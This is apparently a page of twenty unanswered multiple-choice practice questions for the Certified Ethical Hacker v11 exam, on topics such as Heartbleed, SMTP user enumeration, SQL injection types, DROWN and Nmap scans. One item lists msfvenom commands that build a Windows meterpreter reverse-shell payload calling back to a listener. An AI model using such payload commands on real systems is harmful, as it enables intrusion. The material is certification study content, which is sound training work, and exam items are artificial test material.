312-50v11 : Certified Ethical Hacker v11 Exam : Part 07

312-50v11 : Certified Ethical Hacker v11 Exam : Part 07

1. The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.

   What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?

   • Public
   • Private
   • Shared
   • Root

2. Why should the security analyst disable/remove unnecessary ISAPI filters?

   • To defend against social engineering attacks
   • To defend against webserver attacks
   • To defend against jailbreaking
   • To defend against wireless attacks

3. Which of the following is a component of a risk assessment?

   • Administrative safeguards
   • Physical security
   • DMZ
   • Logical interface

4. CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this:

   From: [email protected]
   To: [email protected]
   Subject: Test message
   Date: 4/3/2017 14:37
   The employee of CompanyXYZ receives your email message.

   This proves that CompanyXYZ’s email gateway doesn’t prevent what?

   • Email Masquerading
   • Email Harvesting
   • Email Phishing
   • Email Spoofing

5. Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations.

   Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA.

   In this context, what can you say?

   • Bob can be right since DMZ does not make sense when combined with stateless firewalls
   • Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one
   • Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations
   • Bob is partially right. DMZ does not make sense when a stateless firewall is available

6. Which of the following commands checks for valid users on an SMTP server?

   • RCPT
   • CHK
   • VRFY
   • EXPN

7. Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API.

   Which of the following tools is used by Wilson in the above scenario?

   • Factiva
   • ZoomInfo
   • Netcraft
   • Infoga

8. Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it.

   Which of the following tools did Bob employ to gather the above information?

   • FCC ID search
   • Google image search
   • search.com
   • EarthExplorer

9. A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine.

   Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s web domain?

   • [allinurl:]
   • [location:]
   • [site:]
   • [link:]

10. Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.

    What is the component of the Docker architecture used by Annie in the above scenario?

    • Docker objects
    • Docker daemon
    • Docker client
    • Docker registries

11. You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two employees’ emails from some public sources and are creating a client-side backdoor to send it to the employees via email.

    Which stage of the cyber kill chain are you at?

    • Reconnaissance
    • Weaponization
    • Command and control
    • Exploitation

12. Sam is working as a system administrator in an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize the organization’s vulnerability management processes. The base score that Sam obtained after performing CVSS rating was 4.0.

    What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?

    • Critical
    • Medium
    • High
    • Low

13. John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?

    • Use his own private key to encrypt the message.
    • Use his own public key to encrypt the message.
    • Use Marie’s private key to encrypt the message.
    • Use Marie’s public key to encrypt the message.

14. The network users are complaining because their systems are slowing down. Further, every time they attempt to go to a website, they receive a series of pop-ups with advertisements. What type of malware have the systems been infected with?

    • Trojan
    • Spyware
    • Virus
    • Adware

15. SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application.

    Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an attacker?

    • In-band SQLi
    • Union-based SQLi
    • Out-of-band SQLi
    • Time-based blind SQLi

16. Which type of virus can change its own code and then cipher itself multiple times as it replicates?

    • Stealth virus
    • Tunneling virus
    • Cavity virus
    • Encryption virus

17. What is the port to block first in case you are suspicious that an IoT device has been compromised?

    • 22
    • 48101
    • 80
    • 443

18. What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
    • msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
    • msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

19. Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information.

    Which of the following attacks can be performed by exploiting the above vulnerability?

    • Padding oracle attack
    • DROWN attack
    • DUHK attack
    • Side-channel attack

20. Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered.

    John decided to perform a TCP SYN ping scan on the target network.

    Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

    • nmap -sn -PO < target IP address >
    • nmap -sn -PS < target IP address >
    • nmap -sn -PA < target IP address >
    • nmap -sn -PP < target IP address >